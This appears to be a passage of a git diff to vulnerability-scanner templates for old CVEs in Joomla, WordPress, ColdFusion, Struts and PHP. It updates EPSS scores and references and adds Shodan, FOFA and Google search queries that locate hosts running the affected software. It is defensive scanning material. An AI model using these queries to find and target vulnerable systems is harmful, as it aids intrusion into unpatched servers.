b/http/cves/2010/CVE-2010-1953.yaml index 1aa77d90cf..b6d585837a 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1953 cwe-id: CWE-22 epss-score: 0.05684 - epss-percentile: 0.93171 + epss-percentile: 0.93322 cpe: cpe:2.3:a:joomlacomponent.inetlanka:com_multimap:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index 7bcf1b5fd8..69eff5b4e1 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -12,13 +12,14 @@ info: - https://www.exploit-db.com/exploits/12238 - https://nvd.nist.gov/vuln/detail/CVE-2010-1955 - https://exchange.xforce.ibmcloud.com/vulnerabilities/57846 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1955 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.86287 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_blogfactory:1.1.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 988470fe0d..f02fa9f751 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1956 cwe-id: CWE-22 epss-score: 0.06055 - epss-percentile: 0.92761 + epss-percentile: 0.93494 cpe: cpe:2.3:a:thefactory:com_gadgetfactory:1.0.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index 5b0064eee5..5e3c5d603c 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-1957 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:thefactory:com_lovefactory:1.3.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index f94756a8b9..5c0a1d9858 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -11,13 +11,14 @@ info: reference: - https://www.exploit-db.com/exploits/12083 - https://nvd.nist.gov/vuln/detail/CVE-2010-1977 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2010-1977 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:gohigheris:com_jwhmcs:1.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index 819296c630..e1a7228413 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2010-1982 cwe-id: CWE-22 epss-score: 0.00477 - epss-percentile: 0.73222 + epss-percentile: 0.75733 cpe: cpe:2.3:a:joomlart:com_javoice:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index fa16b9b5dc..0864d1ca53 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2036 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchafieldsattach:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index 52e7647055..d55d60e19c 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2010-2037 cwe-id: CWE-22 - epss-score: 0.00718 - epss-percentile: 0.7851 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:percha:com_perchadownloadsattach:1.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 2fafc5155a..1af5b47a92 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2050 cwe-id: CWE-22 epss-score: 0.03527 - epss-percentile: 0.90637 + epss-percentile: 0.91571 cpe: cpe:2.3:a:m0r0n:com_mscomment:0.8.0:b:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2507.yaml b/http/cves/2010/CVE-2010-2507.yaml index e37ce9a665..5cbf79630a 100644 --- a/http/cves/2010/CVE-2010-2507.yaml +++ b/http/cves/2010/CVE-2010-2507.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2507 cwe-id: CWE-22 epss-score: 0.01671 - epss-percentile: 0.87378 + epss-percentile: 0.87631 cpe: cpe:2.3:a:masselink:com_picasa2gallery:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2680.yaml b/http/cves/2010/CVE-2010-2680.yaml index 99fde06630..5920648367 100644 --- a/http/cves/2010/CVE-2010-2680.yaml +++ b/http/cves/2010/CVE-2010-2680.yaml @@ -11,13 +11,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2010-2680 - http://packetstormsecurity.org/1006-exploits/joomlajesectionfinder-lfi.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/59796 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P cvss-score: 6.8 cve-id: CVE-2010-2680 cwe-id: CWE-22 epss-score: 0.00826 - epss-percentile: 0.80059 + epss-percentile: 0.8192 cpe: cpe:2.3:a:harmistechnology:com_jesectionfinder:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-2861.yaml b/http/cves/2010/CVE-2010-2861.yaml index f89f1e0f29..a0d36c2f90 100644 --- a/http/cves/2010/CVE-2010-2861.yaml +++ b/http/cves/2010/CVE-2010-2861.yaml @@ -20,13 +20,15 @@ info: cve-id: CVE-2010-2861 cwe-id: CWE-22 epss-score: 0.97078 - epss-percentile: 0.99753 + epss-percentile: 0.9977 cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: adobe product: coldfusion shodan-query: http.component:"Adobe ColdFusion" + fofa-query: title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: cve,cve2010,adobe,kev,vulhub,coldfusion,lfi http: diff --git a/http/cves/2010/CVE-2010-2918.yaml b/http/cves/2010/CVE-2010-2918.yaml index 1546f38fc8..a9a05bcd4e 100644 --- a/http/cves/2010/CVE-2010-2918.yaml +++ b/http/cves/2010/CVE-2010-2918.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-2918 cwe-id: CWE-94 epss-score: 0.02847 - epss-percentile: 0.90478 + epss-percentile: 0.90703 cpe: cpe:2.3:a:visocrea:com_joomla_visites:1.1:rc2:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-3203.yaml b/http/cves/2010/CVE-2010-3203.yaml index eb6d38cbf0..73053d63fa 100644 --- a/http/cves/2010/CVE-2010-3203.yaml +++ b/http/cves/2010/CVE-2010-3203.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2010-3203 cwe-id: CWE-22 - epss-score: 0.00626 - epss-percentile: 0.76748 + epss-score: 0.02682 + epss-percentile: 0.90436 cpe: cpe:2.3:a:xmlswf:com_picsell:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4231.yaml b/http/cves/2010/CVE-2010-4231.yaml index 85c0b4a3a6..b7eeed4fc6 100644 --- a/http/cves/2010/CVE-2010-4231.yaml +++ b/http/cves/2010/CVE-2010-4231.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4231 cwe-id: CWE-22 epss-score: 0.01615 - epss-percentile: 0.87178 + epss-percentile: 0.87445 cpe: cpe:2.3:a:camtron:cmnc-200_firmware:1.102a-008:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-4239.yaml b/http/cves/2010/CVE-2010-4239.yaml index 7f6b76880d..1c20c4d676 100644 --- a/http/cves/2010/CVE-2010-4239.yaml +++ b/http/cves/2010/CVE-2010-4239.yaml @@ -20,13 +20,15 @@ info: cvss-score: 9.8 cve-id: CVE-2010-4239 cwe-id: CWE-20 - epss-score: 0.03038 - epss-percentile: 0.90751 + epss-score: 0.02675 + epss-percentile: 0.90421 cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2010,tikiwiki,lfi,tiki http: diff --git a/http/cves/2010/CVE-2010-4282.yaml b/http/cves/2010/CVE-2010-4282.yaml index 4feec95d93..c3053847e4 100644 --- a/http/cves/2010/CVE-2010-4282.yaml +++ b/http/cves/2010/CVE-2010-4282.yaml @@ -26,6 +26,9 @@ info: max-request: 1 vendor: artica product: pandora_fms + shodan-query: http.title:"pandora fms" + fofa-query: title="pandora fms" + google-query: intitle:"pandora fms" tags: cve,cve2010,seclists,phpshowtime,edb,lfi,joomla,artica http: diff --git a/http/cves/2010/CVE-2010-4977.yaml b/http/cves/2010/CVE-2010-4977.yaml index 29d6cfbc01..e93934f80a 100644 --- a/http/cves/2010/CVE-2010-4977.yaml +++ b/http/cves/2010/CVE-2010-4977.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-4977 cwe-id: CWE-89 epss-score: 0.0016 - epss-percentile: 0.51628 + epss-percentile: 0.52542 cpe: cpe:2.3:a:miniwork:com_canteen:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5028.yaml b/http/cves/2010/CVE-2010-5028.yaml index 7504999138..a8375704d5 100644 --- a/http/cves/2010/CVE-2010-5028.yaml +++ b/http/cves/2010/CVE-2010-5028.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2010-5028 cwe-id: CWE-89 epss-score: 0.00316 - epss-percentile: 0.67285 + epss-percentile: 0.70272 cpe: cpe:2.3:a:harmistechnology:com_jejob:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2010/CVE-2010-5278.yaml b/http/cves/2010/CVE-2010-5278.yaml index 55d16d1977..1c896d34d7 100644 --- a/http/cves/2010/CVE-2010-5278.yaml +++ b/http/cves/2010/CVE-2010-5278.yaml @@ -20,13 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2010-5278 cwe-id: CWE-22 - epss-score: 0.06122 - epss-percentile: 0.93381 + epss-score: 0.06135 + epss-percentile: 0.93535 cpe: cpe:2.3:a:modx:modx_revolution:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: modx product: modx_revolution + shodan-query: cpe:"cpe:2.3:a:modx:modx_revolution" tags: cve,cve2010,lfi,edb,packetstorm,modx http: diff --git a/http/cves/2010/CVE-2010-5286.yaml b/http/cves/2010/CVE-2010-5286.yaml index 58bfcca251..e0f0e837c0 100644 --- a/http/cves/2010/CVE-2010-5286.yaml +++ b/http/cves/2010/CVE-2010-5286.yaml @@ -18,8 +18,8 @@ info: cvss-score: 10 cve-id: CVE-2010-5286 cwe-id: CWE-22 - epss-score: 0.07071 - epss-percentile: 0.93832 + epss-score: 0.08973 + epss-percentile: 0.94583 cpe: cpe:2.3:a:joobi:com_jstore:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-0049.yaml b/http/cves/2011/CVE-2011-0049.yaml index f97802ff95..c1ddb90003 100644 --- a/http/cves/2011/CVE-2011-0049.yaml +++ b/http/cves/2011/CVE-2011-0049.yaml @@ -19,8 +19,8 @@ info: cvss-score: 5 cve-id: CVE-2011-0049 cwe-id: CWE-22 - epss-score: 0.96615 - epss-percentile: 0.99548 + epss-score: 0.8814 + epss-percentile: 0.98672 cpe: cpe:2.3:a:mj2:majordomo_2:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2744.yaml b/http/cves/2011/CVE-2011-2744.yaml index 3019f09e60..c1e41eb263 100644 --- a/http/cves/2011/CVE-2011-2744.yaml +++ b/http/cves/2011/CVE-2011-2744.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2744 cwe-id: CWE-22 epss-score: 0.01541 - epss-percentile: 0.86842 + epss-percentile: 0.87103 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-2780.yaml b/http/cves/2011/CVE-2011-2780.yaml index f51495187f..c20a0b9cc0 100644 --- a/http/cves/2011/CVE-2011-2780.yaml +++ b/http/cves/2011/CVE-2011-2780.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-2780 cwe-id: CWE-22 epss-score: 0.03327 - epss-percentile: 0.91127 + epss-percentile: 0.91341 cpe: cpe:2.3:a:chyrp:chyrp:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4336.yaml b/http/cves/2011/CVE-2011-4336.yaml index af1291bb6b..af3473daeb 100644 --- a/http/cves/2011/CVE-2011-4336.yaml +++ b/http/cves/2011/CVE-2011-4336.yaml @@ -24,6 +24,8 @@ info: max-request: 1 vendor: tiki product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + fofa-query: body="tiki wiki" tags: cve,cve2011,seclists,xss,tikiwiki,tiki http: diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml index 369e9bebd4..d13df930f1 100644 --- a/http/cves/2011/CVE-2011-4640.yaml +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -14,12 +14,15 @@ info: cvss-score: 4 cve-id: CVE-2011-4640 cwe-id: CWE-22 - cpe: cpe:2.3:a:spamtitan:spamtitan:*:*:*:*:*:*:*:* + epss-score: 0.05544 + epss-percentile: 0.93225 + cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* metadata: max-request: 3 - product: spamtitan vendor: spamtitan + product: webtitan shodan-query: title:"WebTitan" + fofa-query: icon_hash=1090061843 tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated http: diff --git a/http/cves/2011/CVE-2011-4804.yaml b/http/cves/2011/CVE-2011-4804.yaml index e834c2ac52..4dfc679b6d 100644 --- a/http/cves/2011/CVE-2011-4804.yaml +++ b/http/cves/2011/CVE-2011-4804.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2011-4804 cwe-id: CWE-22 - epss-score: 0.0358 - epss-percentile: 0.9073 + epss-score: 0.44913 + epss-percentile: 0.97396 cpe: cpe:2.3:a:foobla:com_obsuggest:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-4926.yaml b/http/cves/2011/CVE-2011-4926.yaml index d13526871a..30bc5aedd9 100644 --- a/http/cves/2011/CVE-2011-4926.yaml +++ b/http/cves/2011/CVE-2011-4926.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-4926 cwe-id: CWE-79 epss-score: 0.01792 - epss-percentile: 0.86796 + epss-percentile: 0.88084 cpe: cpe:2.3:a:bueltge:adminimize:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: adminimize google-query: inurl:"/wp-content/plugins/adminimize/" tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5106.yaml b/http/cves/2011/CVE-2011-5106.yaml index a5a828c58b..fa5f475e5c 100644 --- a/http/cves/2011/CVE-2011-5106.yaml +++ b/http/cves/2011/CVE-2011-5106.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2011-5106 cwe-id: CWE-79 epss-score: 0.00434 - epss-percentile: 0.7412 + epss-percentile: 0.74554 cpe: cpe:2.3:a:fractalia:flexible_custom_post_type:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2011/CVE-2011-5181.yaml b/http/cves/2011/CVE-2011-5181.yaml index 968b0da94d..f43ff4cd7c 100644 --- a/http/cves/2011/CVE-2011-5181.yaml +++ b/http/cves/2011/CVE-2011-5181.yaml @@ -13,13 +13,15 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2011-5181 - http://wordpress.org/extend/plugins/clickdesk-live-support-chat-plugin/changelog/ - https://exchange.xforce.ibmcloud.com/vulnerabilities/71469 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2011-5181 cwe-id: CWE-79 epss-score: 0.00431 - epss-percentile: 0.71803 + epss-percentile: 0.74451 cpe: cpe:2.3:a:clickdesk:clickdesk_live_support-live_chat_plugin:2.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,7 +29,6 @@ info: product: clickdesk_live_support-live_chat_plugin google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk - flow: http(1) && http(2) http: diff --git a/http/cves/2011/CVE-2011-5265.yaml b/http/cves/2011/CVE-2011-5265.yaml index 9b02ab22c5..8633d31758 100644 --- a/http/cves/2011/CVE-2011-5265.yaml +++ b/http/cves/2011/CVE-2011-5265.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2011-5265 cwe-id: CWE-79 epss-score: 0.00478 - epss-percentile: 0.75288 + epss-percentile: 0.75781 cpe: cpe:2.3:a:featurific_for_wordpress_project:featurific-for-wordpress:1.6.2:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +28,6 @@ info: product: featurific-for-wordpress google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0392.yaml b/http/cves/2012/CVE-2012-0392.yaml index 5c7c2d6751..7e1ccbaa8c 100644 --- a/http/cves/2012/CVE-2012-0392.yaml +++ b/http/cves/2012/CVE-2012-0392.yaml @@ -19,13 +19,16 @@ info: cvss-score: 6.8 cve-id: CVE-2012-0392 cwe-id: NVD-CWE-noinfo - epss-score: 0.9496 - epss-percentile: 0.99239 + epss-score: 0.96232 + epss-percentile: 0.99521 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,apache,rce,struts,java,edb http: diff --git a/http/cves/2012/CVE-2012-0394.yaml b/http/cves/2012/CVE-2012-0394.yaml index 77f250d6b7..871de16bef 100644 --- a/http/cves/2012/CVE-2012-0394.yaml +++ b/http/cves/2012/CVE-2012-0394.yaml @@ -30,6 +30,8 @@ info: vendor: apache product: struts shodan-query: html:"Struts Problem Report" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2012,ognl,injection,edb,apache,struts variables: first: "{{rand_int(1000, 9999)}}" diff --git a/http/cves/2012/CVE-2012-0896.yaml b/http/cves/2012/CVE-2012-0896.yaml index 32cf37a74b..b65085a63e 100644 --- a/http/cves/2012/CVE-2012-0896.yaml +++ b/http/cves/2012/CVE-2012-0896.yaml @@ -20,8 +20,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0896 cwe-id: CWE-22 - epss-score: 0.02262 - epss-percentile: 0.88456 + epss-score: 0.01844 + epss-percentile: 0.883 cpe: cpe:2.3:a:count_per_day_project:count_per_day:2.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml index e118e248b0..89b6adbacb 100644 --- a/http/cves/2012/CVE-2012-0901.yaml +++ b/http/cves/2012/CVE-2012-0901.yaml @@ -14,13 +14,14 @@ info: - http://packetstormsecurity.org/files/view/108470/wpystap-xss.txt - https://exchange.xforce.ibmcloud.com/vulnerabilities/72271 - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-0901 cwe-id: CWE-79 - epss-score: 0.00216 - epss-percentile: 0.59612 + epss-score: 0.00223 + epss-percentile: 0.60514 cpe: cpe:2.3:a:attenzione:yousaytoo:1.0:*:*:*:*:*:*:* metadata: max-request: 1 @@ -28,7 +29,6 @@ info: product: yousaytoo google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-0981.yaml b/http/cves/2012/CVE-2012-0981.yaml index b2f43506a8..5dc025d5ce 100644 --- a/http/cves/2012/CVE-2012-0981.yaml +++ b/http/cves/2012/CVE-2012-0981.yaml @@ -14,13 +14,14 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-0981 - http://www.exploit-db.com/exploits/18435 - https://exchange.xforce.ibmcloud.com/vulnerabilities/72824 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-0981 cwe-id: CWE-22 - epss-score: 0.02053 - epss-percentile: 0.8779 + epss-score: 0.01277 + epss-percentile: 0.85703 cpe: cpe:2.3:a:kybernetika:phpshowtime:2.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-0991.yaml b/http/cves/2012/CVE-2012-0991.yaml index 4742dede6e..102f0e9039 100644 --- a/http/cves/2012/CVE-2012-0991.yaml +++ b/http/cves/2012/CVE-2012-0991.yaml @@ -20,13 +20,16 @@ info: cvss-score: 3.5 cve-id: CVE-2012-0991 cwe-id: CWE-22 - epss-score: 0.81788 - epss-percentile: 0.98116 + epss-score: 0.72743 + epss-percentile: 0.98084 cpe: cpe:2.3:a:openemr:openemr:4.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: openemr product: openemr + fofa-query: icon_hash=1971268439 + shodan-query: http.html:"openemr" + google-query: intitle:"openemr" tags: cve,cve2012,lfi,openemr,traversal,edb http: diff --git a/http/cves/2012/CVE-2012-0996.yaml b/http/cves/2012/CVE-2012-0996.yaml index 3b63c970e3..b2cd77da3a 100644 --- a/http/cves/2012/CVE-2012-0996.yaml +++ b/http/cves/2012/CVE-2012-0996.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5 cve-id: CVE-2012-0996 cwe-id: CWE-22 - epss-score: 0.02194 - epss-percentile: 0.89179 + epss-score: 0.03648 + epss-percentile: 0.91695 cpe: cpe:2.3:a:11in1:11in1:1.2.1:stable_12-31-2011:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2012/CVE-2012-1226.yaml b/http/cves/2012/CVE-2012-1226.yaml index b50c53d3e2..8b7ad35ea2 100644 --- a/http/cves/2012/CVE-2012-1226.yaml +++ b/http/cves/2012/CVE-2012-1226.yaml @@ -19,13 +19,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1226 cwe-id: CWE-22 - epss-score: 0.10469 - epss-percentile: 0.94495 + epss-score: 0.09636 + epss-percentile: 0.94766 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:3.2.0:alpha:*:*:*:*:*:* metadata: max-request: 1 vendor: dolibarr product: dolibarr_erp\/crm + shodan-query: http.favicon.hash:440258421 + fofa-query: icon_hash=440258421 tags: cve,cve2012,lfi,dolibarr,traversal,edb http: diff --git a/http/cves/2012/CVE-2012-1823.yaml b/http/cves/2012/CVE-2012-1823.yaml index 261a508fa6..9535d2cef9 100644 --- a/http/cves/2012/CVE-2012-1823.yaml +++ b/http/cves/2012/CVE-2012-1823.yaml @@ -21,15 +21,15 @@ info: cvss-score: 7.5 cve-id: CVE-2012-1823 cwe-id: CWE-20 - epss-score: 0.97491 - epss-percentile: 0.99972 + epss-score: 0.97363 + epss-percentile: 0.99899 cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: php product: php + shodan-query: cpe:"cpe:2.3:a:php:php" tags: cve,cve2012,kev,vulhub,rce,php - variables: string: "CVE-2012-1823" diff --git a/http/cves/2012/CVE-2012-1835.yaml b/http/cves/2012/CVE-2012-1835.yaml index 900ec78ab6..ec84cf8a73 100644 --- a/http/cves/2012/CVE-2012-1835.yaml +++ b/http/cves/2012/CVE-2012-1835.yaml @@ -18,8 +18,8 @@ info: cvss-score: 4.3 cve-id: CVE-2012-1835 cwe-id: CWE-79 - epss-score: 0.01124 - epss-percentile: 0.84313 + epss-score: 0.00919 + epss-percentile: 0.82867 cpe: cpe:2.3:a:timely:all-in-one_event_calendar:1.4:*:*:*:*:*:*:* metadata: max-request: 1 @@ -27,7 +27,6 @@ info: product: all-in-one_event_calendar google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" tags: cve,cve2012,wordpress,xss,wp-plugin,timely - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-2371.yaml b/http/cves/2012/CVE-2012-2371.yaml index a8e71b45e0..740b647a0f 100644 --- a/http/cves/2012/CVE-2012-2371.yaml +++ b/http/cves/2012/CVE-2012-2371.yaml @@ -20,15 +20,14 @@ info: cvss-score: 4.3 cve-id: CVE-2012-2371 cwe-id: CWE-79 - epss-score: 0.01345 - epss-percentile: 0.85828 + epss-score: 0.01099 + epss-percentile: 0.84417 cpe: cpe:2.3:a:mnt-tech:wp-facethumb:0.1:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mnt-tech product: wp-facethumb tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index c3d18b28f9..88efcb3730 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -24,12 +24,15 @@ info: cve-id: CVE-2012-3153 cwe-id: NVD-CWE-noinfo epss-score: 0.95986 - epss-percentile: 0.99354 + epss-percentile: 0.99471 cpe: cpe:2.3:a:oracle:fusion_middleware:11.1.1.4.0:*:*:*:*:*:*:* metadata: max-request: 2 vendor: oracle product: fusion_middleware + shodan-query: http.title:"weblogic" + fofa-query: title="weblogic" + google-query: intitle:"weblogic" tags: cve,cve2012,oracle,rce,edb http: diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 746bfbe330..f7f1623cb0 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -12,20 +12,21 @@ info: reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4242 - http://www.reactionpenetrationtesting.co.uk/mf-gig-calendar-xss.html + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/d4n-sec/d4n-sec.github.io classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4242 cwe-id: CWE-79 epss-score: 0.00216 - epss-percentile: 0.59546 + epss-percentile: 0.59564 cpe: cpe:2.3:a:mf_gig_calendar_project:mf_gig_calendar:0.9.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: mf_gig_calendar_project product: mf_gig_calendar tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index 3036b6aa54..19515405fd 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2012-4273 cwe-id: CWE-79 epss-score: 0.00252 - epss-percentile: 0.64486 + epss-percentile: 0.65097 cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: 2-click-social-media-buttons google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer - flow: http(1) && http(2) http: diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 978a44a399..5cf6c3ca28 100644 --- 